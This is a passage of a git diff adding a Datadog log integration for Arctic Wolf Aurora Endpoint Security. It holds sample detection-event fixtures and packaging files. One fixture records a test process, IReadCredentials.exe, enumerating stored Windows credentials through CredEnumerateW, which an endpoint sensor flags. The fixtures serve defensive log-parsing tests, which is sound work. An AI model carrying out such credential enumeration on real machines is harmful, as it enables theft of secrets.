"PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "4b199c5c-60dc-4b5c-8dac-86965ba5b051" + event_received_timestamp: "2022-06-28T18:10:43Z" + event_timestamp: "2022-06-28T18:10:39.547Z" + event_type: "OpticsCaePowershellTraceEvent" + evt: + name: "OpticsCaePowershellTraceEvent" + instigating_process_command_line: "powershell gwmi -class win32_process" + instigating_process_file_path: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + instigating_process_imagefilesha256: "DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C" + instigating_process_name: "powershell.exe" + instigating_process_owner: "PENTEST//Administrator" + payload: "None" + payload_length: 0 + script_block_length: 2583 + script_block_text: "@{GUID=\"EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D\"Author=\"Microsoft Corporation\"CompanyName=\"Micros" + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaePowershellTraceEvent, Event Name: OpticsCaePowershellTraceEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 4b199c5c-60dc-4b5c-8dac-86965ba5b051, Severity: Medium, Description: SYSLOG detections - Looking for PowershellTrace get-childitem, Instigating Process Name: powershell.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C, Event Timestamp: 2022-06-28T18:10:39.547Z, Event Received Timestamp: 2022-06-28T18:10:43Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 9eb1073c-913f-49ab-9b12-2e5a28dad18d, Instigating Process Command Line: powershell gwmi -class win32_process, Instigating Process File Path: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe, Script Block Text: @{GUID=\"EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D\"Author=\"Microsoft Corporation\"CompanyName=\"Micros, Script Block Length: 2583, Payload: None, Payload Length: 0, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeWmiEvent, Event Name: OpticsCaeWmiEvent, Device Name: JEFWILLIAMS-1, Zone Names: (JeffTesting,Jeff_3.0), Event Id: 9fa208e5-779d-40b1-b4e2-44c330600396, Severity: Medium, Description: SYSLOG detections - Looking for WmiTrace select, Instigating Process Name: WmiPrvSE.exe, Instigating Process Owner: NT AUTHORITY//NETWORK SERVICE, Instigating Process ImageFileSha256: B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15, Event Timestamp: 2022-06-28T18:09:55.613Z, Event Received Timestamp: 2022-06-28T18:09:57Z, Device Last Reported Users: (RIMNET\\jefwilliams), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,24362CB3F25D4EB59C03FD6E3800C20E), Detection Rule Id: f83b1ac8-b966-4297-be47-bb893bf23f2d, Instigating Process Command Line: C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe-secured-Embedding, Instigating Process File Path: c:\\windows\\system32\\wbem\\wmiprvse.exe, Consumer Text: None, Consumer Text Length: 0, Operation: Start IWbemServices::CreateInstanceEnum - root\\Standardcimv2 : MSFT_NetIPAddress, Operation Length: 80, Device Id: c6246140-bba5-4c55-be02-77300bf91dbc" + result: + custom: + additional_details: "" + consumer_text: "None" + consumer_text_length: 0 + description: "SYSLOG detections - Looking for WmiTrace select" + detection_rule_id: "f83b1ac8-b966-4297-be47-bb893bf23f2d" + device_id: "c6246140-bba5-4c55-be02-77300bf91dbc" + device_last_reported_users: + - "RIMNET\\jefwilliams" + device_name: "JEFWILLIAMS-1" + event_id: "9fa208e5-779d-40b1-b4e2-44c330600396" + event_received_timestamp: "2022-06-28T18:09:57Z" + event_timestamp: "2022-06-28T18:09:55.613Z" + event_type: "OpticsCaeWmiEvent" + evt: + name: "OpticsCaeWmiEvent" + instigating_process_command_line: "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe-secured-Embedding" + instigating_process_file_path: "c:\\windows\\system32\\wbem\\wmiprvse.exe" + instigating_process_imagefilesha256: "B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15" + instigating_process_name: "WmiPrvSE.exe" + instigating_process_owner: "NT AUTHORITY//NETWORK SERVICE" + operation: "Start IWbemServices::CreateInstanceEnum - root\\Standardcimv2 : MSFT_NetIPAddress" + operation_length: 80 + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,24362CB3F25D4EB59C03FD6E3800C20E)" + zone_names: "(JeffTesting,Jeff_3.0)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeWmiEvent, Event Name: OpticsCaeWmiEvent, Device Name: JEFWILLIAMS-1, Zone Names: (JeffTesting,Jeff_3.0), Event Id: 9fa208e5-779d-40b1-b4e2-44c330600396, Severity: Medium, Description: SYSLOG detections - Looking for WmiTrace select, Instigating Process Name: WmiPrvSE.exe, Instigating Process Owner: NT AUTHORITY//NETWORK SERVICE, Instigating Process ImageFileSha256: B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15, Event Timestamp: 2022-06-28T18:09:55.613Z, Event Received Timestamp: 2022-06-28T18:09:57Z, Device Last Reported Users: (RIMNET\\jefwilliams), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,24362CB3F25D4EB59C03FD6E3800C20E), Detection Rule Id: f83b1ac8-b966-4297-be47-bb893bf23f2d, Instigating Process Command Line: C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe-secured-Embedding, Instigating Process File Path: c:\\windows\\system32\\wbem\\wmiprvse.exe, Consumer Text: None, Consumer Text Length: 0, Operation: Start IWbemServices::CreateInstanceEnum - root\\Standardcimv2 : MSFT_NetIPAddress, Operation Length: 80, Device Id: c6246140-bba5-4c55-be02-77300bf91dbc" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Name: OpticsCaeApiEvent, Device Name: SECURITYSERVER3, Zone Names: (ZoneOne,ZoneTwo), Event Id: d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1, Severity: High, Description: Test - API Sensor, High priority event, Instigating Process Name: IReadCredentials.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56, Event Timestamp: 2022-09-28T14:23:37.384Z, Event Received Timestamp: 2022-09-28T14:24:30Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9, Instigating Process Command Line: IReadCredentials.exe, Instigating Process File Path: c:\\apisensor\\ireadcredentials.exe, API DLL: Advapi32.dll, API Function: CredEnumerateW, API Parameters: Unknown" + result: + custom: + additional_details: "" + api_dll: "Advapi32.dll" + api_function: "CredEnumerateW" + api_parameters: "Unknown" + description: "Test - API Sensor, High priority event" + detection_rule_id: "be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1" + event_received_timestamp: "2022-09-28T14:24:30Z" + event_timestamp: "2022-09-28T14:23:37.384Z" + evt: + name: "OpticsCaeApiEvent" + instigating_process_command_line: "IReadCredentials.exe" + instigating_process_file_path: "c:\\apisensor\\ireadcredentials.exe" + instigating_process_imagefilesha256: "E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56" + instigating_process_name: "IReadCredentials.exe" + instigating_process_owner: "PENTEST//Administrator" + service: "detection-events" + severity: "High" + status: "critical" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(ZoneOne,ZoneTwo)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Name: OpticsCaeApiEvent, Device Name: SECURITYSERVER3, Zone Names: (ZoneOne,ZoneTwo), Event Id: d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1, Severity: High, Description: Test - API Sensor, High priority event, Instigating Process Name: IReadCredentials.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56, Event Timestamp: 2022-09-28T14:23:37.384Z, Event Received Timestamp: 2022-09-28T14:24:30Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9, Instigating Process Command Line: IReadCredentials.exe, Instigating Process File Path: c:\\apisensor\\ireadcredentials.exe, API DLL: Advapi32.dll, API Function: CredEnumerateW, API Parameters: Unknown" + service: "detection-events" + status: "critical" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 diff --git a/arctic_wolf_aurora_endpoint_security/changelog.d/1.added b/arctic_wolf_aurora_endpoint_security/changelog.d/1.added new file mode 100644 index 0000000000000..aa949b47b7b41 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/changelog.d/1.added @@ -0,0 +1 @@ +Initial Release \ No newline at end of file diff --git a/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__about__.py b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__about__.py new file mode 100644 index 0000000000000..1bde5986a04b2 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__about__.py @@ -0,0 +1,4 @@ +# (C) Datadog, Inc. 2025-present +# All rights reserved +# Licensed under a 3-clause BSD style license (see LICENSE) +__version__ = '0.0.1' diff --git a/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__init__.py b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__init__.py new file mode 100644 index 0000000000000..b408666583b85 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/__init__.py @@ -0,0 +1,6 @@ +# (C) Datadog, Inc. 2025-present +# All rights reserved +# Licensed under a 3-clause BSD style license (see LICENSE) +from .__about__ import __version__ + +__all__ = ['__version__'] diff --git a/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/data/conf.yaml.example b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/data/conf.yaml.example new file mode 100644 index 0000000000000..df4f8b71feef5 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/datadog_checks/arctic_wolf_aurora_endpoint_security/data/conf.yaml.example @@ -0,0 +1,20 @@ +## Log Section +## +## type - required - Type of log input source (tcp / udp / file / windows_event). +## port / path / channel_path - required - Set port if type is tcp or udp. +## Set path if type is file. +## Set channel_path if type is windows_event. +## source - required - Attribute that defines which integration sent the logs +## service - required - The name of the service that generates the log. +## Overrides any `service` defined in the `init_config` section. +## encoding - optional - For file specifies the file encoding. Default is utf-8. Other +## possible values are utf-16-le and utf-16-be. +## tags - optional - Add tags to the collected logs +## +## Discover Datadog log collection: https://docs.datadoghq.com/logs/log_collection/ +# +# logs: +# - type: file +# path: /var/log/arctic_wolf_aurora_endpoint_security.log +# source: arctic_wolf_aurora_endpoint_security +# service: diff --git a/arctic_wolf_aurora_endpoint_security/images/IMAGES_README.md b/arctic_wolf_aurora_endpoint_security/images/IMAGES_README.md new file mode 100644 index 0000000000000..443f3c45e3385 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/images/IMAGES_README.md @@ -0,0 +1,41 @@ +# Marketplace Media Carousel Guidelines + +## Using the media gallery + +Please upload images to use the media gallery. Integrations require a minimum of 3 images. Images should highlight your product, your integration, and a full image of the Datadog integration dashboard. The gallery +can hold a maximum of 8 pieces of media total, and one of these pieces of media +can be a video (guidelines and submission steps below). Images should be +added to your /images directory and referenced in the manifest.json file. + + +## Image and video requirements + +### Images + +``` +File type : .jpg or .png +File size : ~500 KB per image, with a max of 1 MB per image +File dimensions : The image must be between 1440px and 2880px width, with a 16:9 aspect ratio (for example: 1440x810) +File name : Use only letters, numbers, underscores, and hyphens +Color mode : RGB +Color profile : sRGB +Description : 300 characters maximum +``` + +### Video + +To display a video in your media gallery, please send our team the zipped file +or a link to download the video at `marketplace@datadog.com`. In addition, +please upload a thumbnail image for your video as a part of the pull request. +Once approved, we will upload the file to Vimeo and provide you with the +vimeo_id to add to your manifest.json file. Please note that the gallery can +only hold one video. + +``` +File type : MP4 H.264 +File size : Max 1 video; 1 GB maximum size +File dimensions : The aspect ratio must be exactly 16:9, and the resolution must be 1920x1080 or higher +File name : partnerName-appName.mp4 +Run time : Recommendation of 60 seconds or less +Description : 300 characters maximum +``` diff --git a/arctic_wolf_aurora_endpoint_security/manifest.json b/arctic_wolf_aurora_endpoint_security/manifest.json new file mode 100644 index 0000000000000..f5bc68ef85745 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/manifest.json @@ -0,0 +1,44 @@ +{ + "manifest_version": "2.0.0", + "app_uuid": "6cffdd38-a25e-4399-a17e-466f53056bf1", + "app_id": "arctic-wolf-aurora-endpoint-security", + "display_on_public_website": false, + "tile": { + "overview": "README.md#Overview", + "configuration": "README.md#Setup", + "support": "README.md#Support", + "changelog": "CHANGELOG.md", + "description": "", + "title": "Arctic Wolf Aurora Endpoint Security", + "media": [], + "classifier_tags": [ + "Supported OS::Linux", + "Supported OS::Windows", + "Supported OS::macOS", + "Category::Log Collection" + ] + }, + "assets": { + "integration": { + "auto_install": true, + "source_type_id": 64142936, + "source_type_name": "Arctic Wolf Aurora Endpoint Security", + "configuration": { + "spec": "assets/configuration/spec.yaml" + }, + "events": { + "creates_events": false + } + }, + "dashboards": {}, + "logs": { + "source": "arctic-wolf-aurora-endpoint-security" + } + }, + "author": { + "support_email": "help@datadoghq.com", + "name": "Datadog", + "homepage": "https://www.datadoghq.com", + "sales_email": "info@datadoghq.com" + } +} diff --git a/arctic_wolf_aurora_endpoint_security/metadata.csv b/arctic_wolf_aurora_endpoint_security/metadata.csv new file mode 100644 index 0000000000000..02cde5e98381e --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/metadata.csv @@ -0,0 +1 @@ +metric_name,metric_type,interval,unit_name,per_unit_name,description,orientation,integration,short_name,curated_metric,sample_tags diff --git a/arctic_wolf_aurora_endpoint_security/pyproject.toml b/arctic_wolf_aurora_endpoint_security/pyproject.toml new file mode 100644 index 0000000000000..2025ab94e6318 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/pyproject.toml @@ -0,0 +1,59 @@ +[build-system] +requires = [ + "hatchling>=0.13.0", +] +build-backend = "hatchling.build" + +[project] +name = "datadog-arctic-wolf-aurora-endpoint-security" +description = "The Arctic Wolf Aurora Endpoint Security check" +readme = "README.md" +license = "BSD-3-Clause" +keywords = [ + "datadog", + "datadog agent", + "datadog check", + "arctic_wolf_aurora_endpoint_security", +] +authors = [ + { name = "Datadog", email = "packages@datadoghq.com" }, +] +classifiers = [ + "Development Status :: 5 - Production/Stable", + "Intended Audience :: Developers", + "Intended Audience :: System Administrators", + "License :: OSI Approved :: BSD License", + "Private :: Do Not Upload", + "Programming Language :: Python :: 3.13", + "Topic :: System :: Monitoring", +] +dependencies = [ + "datadog-checks-base>=37.21.0", +] +dynamic = [ + "version", +] + +[project.optional-dependencies] +deps = [] + +[project.urls] +Source = "https://github.com/DataDog/integrations-core" + +[tool.hatch.version] +path = "datadog_checks/arctic_wolf_aurora_endpoint_security/__about__.py" + +[tool.hatch.build.targets.sdist] +include = [ + "/datadog_checks", + "/tests", + "/manifest.json", +] + +[tool.hatch.build.targets.wheel] +include = [ + "/datadog_checks/arctic_wolf_aurora_endpoint_security", +] +dev-mode-dirs = [ + ".", +]